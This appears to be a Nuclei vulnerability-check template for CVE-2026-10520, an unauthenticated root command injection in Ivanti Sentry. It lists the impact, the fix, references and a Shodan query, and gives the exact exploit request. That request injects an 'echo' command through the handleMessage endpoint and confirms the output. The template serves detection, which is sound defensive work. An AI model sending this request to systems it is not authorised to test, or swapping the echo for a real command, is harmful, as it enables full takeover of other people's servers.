id: CVE-2026-10520

info:
  name: Ivanti Sentry - OS Command Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution
  impact: |
    Remote unauthenticated attackers can execute code as root, leading to full system compromise.
  remediation: |
    Upgrade to versions R10.5.2, R10.6.2, or R10.7.1 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-10520
    - https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523/blob/main/README.md
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"Ivanti" html:"Sentry"
  tags: cve,cve2026,ivanti,sentry,rce,vkev,kev

http:
  - raw:
      - |
        POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        message=execute%20system%20%2fconfiguration%2fsystem%2fcommandexec%20%3ccommandexec%3e%3cindex%3e1%3c%2findex%3e%3creqandres%3eecho%20CVE-2026-10520%3c%2freqandres%3e%3c%2fcommandexec%3e

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Message handled successfully"
          - "CVE-2026-10520"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bf4183f42e58ed6847f53e8806ee9de5bf29ddb80abf82357fef07c4b1c97a7202200bfb46e1236eebeb6c7dd24ea693fff634d5cd1c6ceb38d8e390c61ba8512ffa:922c64590222798bb761d5b6d8e72950